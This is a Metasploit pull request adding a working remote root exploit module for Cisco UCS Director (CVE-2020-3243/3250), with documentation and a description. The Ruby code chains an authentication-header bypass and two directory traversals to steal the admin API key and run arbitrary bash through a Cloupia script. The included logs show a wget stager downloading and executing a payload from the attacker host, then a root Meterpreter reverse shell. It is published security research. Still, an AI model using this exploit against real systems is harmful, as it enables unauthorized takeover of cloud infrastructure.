### PR TITLE
Add Cisco UCS Director auth bypass, directory traversal(s), and Cloupia script RCE (CVE-2020-3243 / ZDI-20-540)

### DIFF
--- a/documentation/modules/exploit/linux/http/cisco_ucs_cloupia_script_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_ucs_cloupia_script_rce.md
@@ -1,0 +1,143 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authentication bypass and directory traversals
+in Cisco UCS Director < 6.7.4.0 to leak the administrator's REST API
+key and execute a Cloupia script containing an arbitrary root command.
+
+Note that the primary functionality of this module is to leverage the
+Cloupia script interpreter to execute code. This functionality is part
+of the application's intended operation and considered a "foreverday."
+The authentication bypass and directory traversals only get us there.
+
+If you already have an API key, you may set it in the `API_KEY` option.
+The `LEAK_FILE` option may be set if you wish to leak the API key from a
+different absolute path, but normally this isn't advisable.
+
+Tested on Cisco's VMware distribution of 6.7.3.0.
+
+### Setup
+
+**Note:** You will need a Cisco account to proceed, particularly for
+**software.cisco.com**. _\*Cough\*_
+
+1. Download
+   [CUCSD_6_7_3_0_67414_VMWARE_SIGNED_EVAL.zip](https://software.cisco.com/download/home/286320555/type/285018084/release/6)
+2. Unzip `CUCSD_6_7_3_0_67414_VMWARE_SIGNED_EVAL.zip` and unzip
+   `CUCSD_6_7_3_0_67414_VMWARE_GA.zip` inside it
+3. Import `CUCSD_6_7_3_0_67414.ovf` into VMware or your preferred
+   virtualization software
+4. Start the VM and wait for the system to finish booting
+5. Visit <https://[RHOST]/app/ui/login.jsp>, where `[RHOST]` is the
+   target's IP
+6. Wait nearly forever for the system to finish initializing
+7. Sign in with `admin:admin` to log the admin's REST API key in
+   `/opt/infra/idaccessmgr/logfile.txt`
+
+You are now ready to test the module using the steps below.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### API_KEY
+
+If you already have an admin REST API key, you can authenticate with it
+by setting this option.
+
+### LEAK_FILE
+
+This is the file to leak the API key from, specified as an absolute
+path. It defaults to `/opt/infra/idaccessmgr/logfile.txt`, and you
+shouldn't need to change it.
+
+## Scenarios
+
+### Cisco UCS Director 6.7.3.0 VMware distribution
+
+```
+msf5 > use exploit/linux/http/cisco_ucs_cloupia_script_rce
+msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > options
+
+Module options (exploit/linux/http/cisco_ucs_cloupia_script_rce):
+
+   Name       Current Setting                     Required  Description
+   ----       ---------------                     --------  -----------
+   API_KEY                                        no        API key if you have it
+   LEAK_FILE  /opt/infra/idaccessmgr/logfile.txt  yes       Leak API key from this file (absolute path)
+   Proxies                                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443                                 yes       The target port (TCP)
+   SRVHOST    0.0.0.0                             yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080                                yes       The local port to listen on.
+   SSL        true                                no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                        no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                                   yes       Base path
+   URIPATH                                        no        The URI to use for this exploit (default is random)
+   VHOST                                          no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > set rhosts 172.16.249.158
+rhosts => 172.16.249.158
+msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > run
+
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[!] The service is running, but could not be validated. Target is running Cisco UCS Director.
+[*] Creating exports directory
+[+] Successfully created exports directory
+[*] Leaking API key from /opt/infra/idaccessmgr/logfile.txt
+[+] Successfully dumped /opt/infra/idaccessmgr/logfile.txt
+[+] Found API key: FE30858BE2FD4BAB8208F5A1DE909AAD
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
+[*] Using URL: http://0.0.0.0:8080/vV8W6PFtOmPZIe
+[*] Local IP: http://192.168.1.3:8080/vV8W6PFtOmPZIe
+[*] Generated command stager: ["wget -qO /tmp/BaebLrFX http://172.16.249.1:8080/vV8W6PFtOmPZIe;chmod +x /tmp/BaebLrFX;/tmp/BaebLrFX;rm -f /tmp/BaebLrFX"]
+[*] Executing command: wget -qO /tmp/BaebLrFX http://172.16.249.1:8080/vV8W6PFtOmPZIe;chmod +x /tmp/BaebLrFX;/tmp/BaebLrFX;rm -f /tmp/BaebLrFX
+[+] Successfully executed command: wget -qO /tmp/BaebLrFX http://172.16.249.1:8080/vV8W6PFtOmPZIe;chmod +x /tmp/BaebLrFX;/tmp/BaebLrFX;rm -f /tmp/BaebLrFX
+[*] Client 172.16.249.158 (Wget/1.12 (linux-gnu)) requested /vV8W6PFtOmPZIe
+[*] Sending payload to 172.16.249.158 (Wget/1.12 (linux-gnu))
+[*] Command Stager progress - 100.00% done (119/119 bytes)
+[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.158:35570) at 2020-05-10 05:46:44 -0500
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root @ localhost (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : localhost.localdom
+OS           : CentOS 6.7 (Linux 2.6.32-754.6.3.el6.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

--- a/modules/exploits/linux/http/cisco_ucs_cloupia_script_rce.rb
+++ b/modules/exploits/linux/http/cisco_ucs_cloupia_script_rce.rb
@@ -1,0 +1,301 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco UCS Director Cloupia Script RCE',
+        'Description' => %q{
+          This module exploits an authentication bypass and directory traversals
+          in Cisco UCS Director < 6.7.4.0 to leak the administrator's REST API
+          key and execute a Cloupia script containing an arbitrary root command.
+
+          Note that the primary functionality of this module is to leverage the
+          Cloupia script interpreter to execute code. This functionality is part
+          of the application's intended operation and considered a "foreverday."
+          The authentication bypass and directory traversals only get us there.
+
+          If you already have an API key, you may set it in the API_KEY option.
+          The LEAK_FILE option may be set if you wish to leak the API key from a
+          different absolute path, but normally this isn't advisable.
+
+          Tested on Cisco's VMware distribution of 6.7.3.0.
+        },
+        'Author' => [
+          'mr_me', # Discovery and exploit
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-3243'], # X-Cloupia-Request-Key auth bypass
+          ['CVE', '2020-3250'], # Directory traversal #2 (userAPIDownloadFile)
+          ['ZDI', '20-540'], # X-Cloupia-Request-Key auth bypass
+          ['ZDI', '20-538'], # Directory traversal #2 (userAPIDownloadFile)
+          ['URL', 'https://srcincite.io/blog/2020/04/17/strike-three-symlinking-your-way-to-unauthenticated-access-against-cisco-ucs-director.html'],
+          ['URL', 'https://srcincite.io/pocs/src-2020-0014.py.txt']
+        ],
+        'DisclosureDate' => '2020-04-15', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Type' => :unix_command,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          ],
+          [
+            'Linux Dropper',
+            'Platform' => 'linux',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :linux_dropper,
+            'DefaultOptions' => {
+              'CMDSTAGER::FLAVOR' => 'wget',
+              'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('API_KEY', [false, 'API key if you have it']),
+      OptString.new(
+        'LEAK_FILE',
+        [
+          true,
+          'Leak API key from this file (absolute path)',
+          '/opt/infra/idaccessmgr/logfile.txt'
+        ]
+      )
+    ])
+
+    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+    import_target_defaults
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/app/ui/login.jsp')
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check request.')
+    end
+
+    unless res.code == 200 && res.body.include?('Cisco UCS Director')
+      return CheckCode::Unknown('Target is not running Cisco UCS Director.')
+    end
+
+    CheckCode::Detected('Target is running Cisco UCS Director.')
+  end
+
+  def exploit
+    unless datastore['LEAK_FILE'].start_with?('/')
+      fail_with(Failure::BadConfig, 'LEAK_FILE is not an absolute path')
+    end
+
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    # Randomly named file is never written to the exports directory
+    create_exports_dir(
+      '/opt/infra/web_cloudmgr/apache-tomcat/webapps/app/cloudmgr/exports',
+      rand_text_alphanumeric(8..42)
+    )
+
+    if (@api_key = datastore['API_KEY'])
+      print_status("User-specified API key: #{@api_key}")
+    else
+      leak_api_key(datastore['LEAK_FILE'])
+    end
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_command
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def create_exports_dir(*path_parts)
+    path = normalize_uri(path_parts)
+
+    mime = Rex::MIME::Message.new
+    mime.add_part(
+      Faker::Hacker.say_something_smart, # data
+      'text/plain', # content_type
+      nil, # transfer_encoding
+      %(form-data; name="#{rand_text_alphanumeric(8..42)}"; ) +
+        # Directory traversal #1
+        %(filename="../../../..#{path}") # content_disposition
+    )
+
+    print_status('Creating exports directory')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cloupia/api/rest'),
+      'headers' => {
+        'X-Cloupia-Request-Key' => '' # Auth bypass
+      },
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'vars_get' => {
+        'opName' => 'userAPI:userAPIUnifiedImport',
+        'opData' => '{}'
+      },
+      'data' => mime.to_s
+    )
+
+    unless res
+      fail_with(Failure::Unknown, "Target did not respond to #{__method__}")
+    end
+
+    # It will always return 200, even on error
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Target returned #{res.code} code")
+    end
+
+    # It will always return this error, despite creating the directory!
+    unless res.body.include?('Cannot execute operation')
+      fail_with(Failure::NotVulnerable, 'Could not create exports directory')
+    end
+
+    print_good('Successfully created exports directory')
+  end
+
+  def leak_api_key(*path_parts)
+    path = normalize_uri(path_parts)
+
+    print_status("Leaking API key from #{path}")
+
+    # TODO: Chunk this!
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/cloupia/api/rest'),
+      'headers' => {
+        'X-Cloupia-Request-Key' => '' # Auth bypass
+      },
+      'vars_get' => {
+        'opName' => 'userAPI:userAPIDownloadFile',
+        'opData' => {
+          # Directory traversal #2
+          'param0' => "../../../../../../../..#{path}"
+        }.to_json
+      },
+      'partial' => true
+    )
+
+    unless res
+      fail_with(Failure::Unknown, "Target did not respond to #{__method__}")
+    end
+
+    # It will always return 200, even on error
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Target returned #{res.code} code")
+    end
+
+    # There is no spoon
+    if res.body.include?('There is no file with the name')
+      fail_with(Failure::NotFound, "#{path} does not exist")
+    end
+
+    # An empty body may indicate permission denied
+    if res.body.empty?
+      fail_with(Failure::UnexpectedReply, "#{path} is empty or unreadable")
+    end
+
+    vprint_good("Successfully dumped #{path}")
+
+    @api_key =
+      res.body.scan(/"loginName":"admin".+"restKey":"(\h+)"/).flatten.first
+
+    unless @api_key
+      fail_with(Failure::NoAccess, 'Could not find API key')
+    end
+
+    print_good("Found API key: #{@api_key}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cloupia/api-v2/generalActions'),
+      'headers' => {
+        'X-Cloupia-Request-Key' => @api_key
+      },
+      'ctype' => 'text/xml',
+      'data' => cloupia_script(cmd)
+    )
+
+    unless res
+      fail_with(Failure::Unknown, "Target did not respond to #{__method__}")
+    end
+
+    # It will always return 200, even on error
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Target returned #{res.code} code")
+    end
+
+    # Just like Unix, a status of 0 indicates success
+    unless res.body.include?('<operationStatus>0</operationStatus')
+      fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
+    end
+
+    print_good("Successfully executed command: #{cmd}")
+  end
+
+  def cloupia_script(cmd)
+    escaped_cmd = cmd.gsub('"', '\\"')
+
+    script =
+      %(new java.lang.ProcessBuilder("bash", "-c", "#{escaped_cmd}").start();)
+
+    <<~XML
+      <?xml version="1.0" encoding="UTF-8"?>
+      <cuicOperationRequest>
+        <operationType>EXECUTE_CLOUPIA_SCRIPT</operationType>
+        <payload>
+          <![CDATA[
+            <ExecuteCloupiaScript>
+              <label>#{rand_text_alphanumeric(8..42)}</label>
+              <script>#{script.encode(xml: :text)}</script>
+            </ExecuteCloupiaScript>
+          ]]>
+        </payload>
+      </cuicOperationRequest>
+    XML
+  end
+
+end

--- a/modules/exploits/linux/http/cisco_ucs_cloupia_script_rce.rb
+++ b/modules/exploits/linux/http/cisco_ucs_cloupia_script_rce.rb
@@ -156,7 +156,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'text/plain', # content_type
       nil, # transfer_encoding
       %(form-data; name="#{rand_text_alphanumeric(8..42)}"; ) +
-        # Directory traversal #1
+        # Directory traversal #1:
+        #   /opt/infra/uploads/ApiUploads/../../../../foo/bar -> /foo/bar
         %(filename="../../../..#{path}") # content_disposition
     )
 
@@ -208,7 +209,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => {
         'opName' => 'userAPI:userAPIDownloadFile',
         'opData' => {
-          # Directory traversal #2
+          # Directory traversal #2:
+          #   /opt/infra/web_cloudmgr/apache-tomcat/webapps/app/cloudmgr/exports/../../../../../../../../foo/bar -> /foo/bar
           'param0' => "../../../../../../../..#{path}"
         }.to_json
       },

--- a/modules/exploits/linux/http/cisco_ucs_cloupia_script_rce.rb
+++ b/modules/exploits/linux/http/cisco_ucs_cloupia_script_rce.rb
@@ -277,10 +277,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cloupia_script(cmd)
-    escaped_cmd = cmd.gsub('"', '\\"')
-
-    script =
-      %(new java.lang.ProcessBuilder("bash", "-c", "#{escaped_cmd}").start();)
+    # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html
+    script = <<~JAVA.tr("\n", '')
+      new java.lang.ProcessBuilder(
+        "bash",
+        "-c",
+        new java.lang.String(
+          java.util.Base64.getDecoder().decode(
+            "#{Rex::Text.encode_base64(cmd)}"
+          )
+        )
+      ).start();
+    JAVA
 
     <<~XML
       <?xml version="1.0" encoding="UTF-8"?>


### PR DESCRIPTION
## Background

> [Cisco UCS Director](https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-director/index.html) is a heterogeneous platform for private cloud Infrastructure as a Service (IaaS). It supports a variety of hypervisors along with Cisco and third-party servers, network, storage, converged and hyperconverged infrastructure across bare-metal and virtualized environments.

:cloud:

Please read the [writeup](https://srcincite.io/blog/2020/04/17/strike-three-symlinking-your-way-to-unauthenticated-access-against-cisco-ucs-director.html) and reference the [PoC](https://srcincite.io/pocs/src-2020-0014.py.txt). This is [CVE-2020-3243](https://nvd.nist.gov/vuln/detail/CVE-2020-3243) and [ZDI-20-540](https://www.zerodayinitiative.com/advisories/ZDI-20-540/).

Amazing research yet again, @stevenseeley!

## To-do

- [ ] Chunk `LEAK_FILE` download
  - It may be desirable to rework the API, and at least we can return partial responses within a timeout as of #12510; I'll work on this later, since I've got other things in flight at the moment!

## Example

```
msf5 exploit(linux/http/cisco_ucs_cloupia_script_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. Target is running Cisco UCS Director.
[*] Creating exports directory
[+] Successfully created exports directory
[*] Leaking API key from /opt/infra/idaccessmgr/logfile.txt
[+] Successfully dumped /opt/infra/idaccessmgr/logfile.txt
[+] Found API key: FE30858BE2FD4BAB8208F5A1DE909AAD
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/vV8W6PFtOmPZIe
[*] Local IP: http://192.168.1.3:8080/vV8W6PFtOmPZIe
[*] Generated command stager: ["wget -qO /tmp/BaebLrFX http://172.16.249.1:8080/vV8W6PFtOmPZIe;chmod +x /tmp/BaebLrFX;/tmp/BaebLrFX;rm -f /tmp/BaebLrFX"]
[*] Executing command: wget -qO /tmp/BaebLrFX http://172.16.249.1:8080/vV8W6PFtOmPZIe;chmod +x /tmp/BaebLrFX;/tmp/BaebLrFX;rm -f /tmp/BaebLrFX
[+] Successfully executed command: wget -qO /tmp/BaebLrFX http://172.16.249.1:8080/vV8W6PFtOmPZIe;chmod +x /tmp/BaebLrFX;/tmp/BaebLrFX;rm -f /tmp/BaebLrFX
[*] Client 172.16.249.158 (Wget/1.12 (linux-gnu)) requested /vV8W6PFtOmPZIe
[*] Sending payload to 172.16.249.158 (Wget/1.12 (linux-gnu))
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.158:35570) at 2020-05-10 05:46:44 -0500
[*] Server stopped.

meterpreter > getuid
Server username: root @ localhost (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : localhost.localdom
OS           : CentOS 6.7 (Linux 2.6.32-754.6.3.el6.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```